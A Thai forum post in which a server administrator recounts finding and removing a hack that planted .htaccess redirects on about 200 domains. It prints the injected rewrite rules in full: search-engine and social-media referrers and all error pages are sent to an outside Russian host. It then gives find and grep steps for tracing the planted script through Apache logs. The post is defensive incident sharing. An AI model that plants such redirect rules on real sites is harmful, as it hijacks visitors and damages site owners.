** ออกตัวก่อนว่า เป็นแค่ 1 วิธี ที่ผมได้ลองหาต้นตอ เพื่อแก้แล้ว หายนะครับ ไม่ได้เก่งอะไร ^___^ " **
หลังจากเมื่อสองวันก่อน search keyword ที่นั่งปั่นอยู่ดีๆ แล้วเกิดอาการ กดเข้าไปที่เว้บตัวเอง แต่ดันเด้งไปเว็บอื่นซะงั้น
ให้ตายซิ มันเป็นเพราะอะไร .. ไม่ชักช้า จากประสบการ ไอ้การ Redirect นี่ ไม่โดนฝัง .htaccess ก็ โดนยัด index.php แน่ๆ
นั่งงมอยู่พักใหญ่ ได้ความว่า ตูโดนเขียนไฟล์ .htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
</IfModule>
ErrorDocument 400 http://hereadmin.ru/kernel/index.php
ErrorDocument 401 http://hereadmin.ru/kernel/index.php
ErrorDocument 403 http://hereadmin.ru/kernel/index.php
ErrorDocument 404 http://hereadmin.ru/kernel/index.php
ErrorDocument 500 http://hereadmin.ru/kernel/index.php
จับใจความได้ว่า .. ไม่ว่าผู้เข้าชม จะเข้าเว็บเรามาจากหนทางใด ไม่ว่าจะเป็น Google หรือ Search Engine ชื่อดังต่างๆ รวมไปถึงการแปะลิ้งไว้ที่ Facebook ผู้เข้าชมเหล่านั้น จะถูกย้ายไป เว็บปลายทางทันที
ยกเว้น พิมพ์เข้าตรงๆ หรือ มาจาก Bookmark
สิ่งแรกที่ทำคือ .. ลบมันออก แล้วทับด้วยของเก่า .. ผลคือไม่หายหรอก ให้ตายซิ Hacker มันไม่ได้โง่ขนาดนั้นนะ เห่อๆ
และที่สำคัญ กว่า 200 โดเมน บน Server มันเขียนไว้หมด
หลังจากที่หาวิธีแก้เองไม่ได้ ก็เลยต้องหาตัวช่วยใน TSB นี่แหล่ะ ตามกระทู้ด้านล่างนี้ ที่มีอาการใกล้เคียงกัน
http://www.thaiseoboard.com/index.php?topic=249004.0 
http://www.thaiseoboard.com/index.php?topic=196996.0 http://www.thaiseoboard.com/index.php?topic=181380.0 แต่ว่า .. ก็ยังไม่ได้คำตอบ
เมื่อไม่ได้คำตอบ ก็หาต่อไป
หาต่อไป
หลังจากทั้ง find ทั้ง grep ทั้ง เช็ค log apache อยู่ 2 วันเต็มๆ เว็บที่ indexed ไปแล้ว เริ่มเกิดอาการหน้าแดง warning จาก google
ก็มาค้นพบ ไฟล์ๆ นึง มาอยู่ในที่ที่ไม่ควรมาอยู่ ใน root ของ vhost (ไม่ใช่ root ของ www นะ)
ก็ vi เข้าไปดู นั่นไง เต็มๆ ไม่ต้องอ่านออก ก็รู้ว่า script malware ชัดๆ ไม่รีรอที่จะ copy เก็บไว้ให้ฝ่ายนิติวิทยาศาสตร์ ตรวจ แล้ว rm ออกทันที
หลังจากรอดูผลอยู่ครู่ใหญ่ๆ ไม่มีการกระทำใดๆ ที่ผิดปกติแล้ว ... รอดแล้ว ... เตรียมไปฉลองปีใหม่ อย่างมีความสุขได้แล้วล่ะ
ก็เลยอยากจะเอามาแชร์ให้เพื่อนๆ ในบอร์ดได้เป็นแนวทางในการค้นหา ต้นตอของปัญหา เพื่อเป็นอีก 1 หนทาง เผื่อจะฟลุ๊ค แก้ได้อย่างผมครับ
ผมจะลงพวกคำสั่ง และวิธีการต่างๆ ที่ผมลองใช้ จนเจอ และแก้ไขปัญหาได้ ไว้ด้านล่างนี้ครับ หวังว่า น่าจะช่วยได้บ้าง ไม่มากก็น้อยครับ
find -name ".htaccess" /{root paht}
คำสั่งนี้ ใช้ค้นหา .htaccess ที่อยู่บน root www ทั้งหมดครับ หาเจอแล้วลองดูว่า ใน .htaccess นั้นมี script แปลกๆ มั้ย ถ้ามีก็ลบออกครับ
รอซักพัก ถ้ามันเขียนขึ้นมาใหม่ แบบเดิม ก็แสดงว่า โดนแล้วละครับ
หลังจากนั้น
หรือคำสั่งอื่น เพื่อเช็คว่าไฟล์ .htaccess นั้นถูกสร้างขึ้นเมื่อเวลาเท่าไหร่
grep -r "{วันเวลาที่เช็คได้}" /{log directory}
ใช้คำสั่ง grep -r โดยระบุ วันเวลา ตาม format ของ log file เพื่อค้นหา record ในเวลานั้นๆ ขึ้นมาวิเคราะห์ครับ
ตัวอย่างของผม คือ ในเวลา ที่ผมตรวจเจอนั้น มีการเรียกใช้จากคำสั่ง POST จาก โดเมนนึงในระบบ
ผมจึงรู้ว่า มันไปเรียกไฟล์อะไรขึ้นมาทำงาน เมื่อรู้อย่างนั้นแล้ว ผมก็ find -name เจ้าไฟล์ปัญหานั้น จนเจอ และลบทิ้งไปครับ
เรื่องราวก็มีอยู่ประมาณนี้ครับ ใครที่เจอเหมือนกัน ก็ลองดูหลายๆ วิธีนะครับ หรือมีวิธีอื่นที่แก้ไขได้ ก็นำมาแชร์กันนะครับ
ขอบคุณครับ
ความรู้ทั่วไป
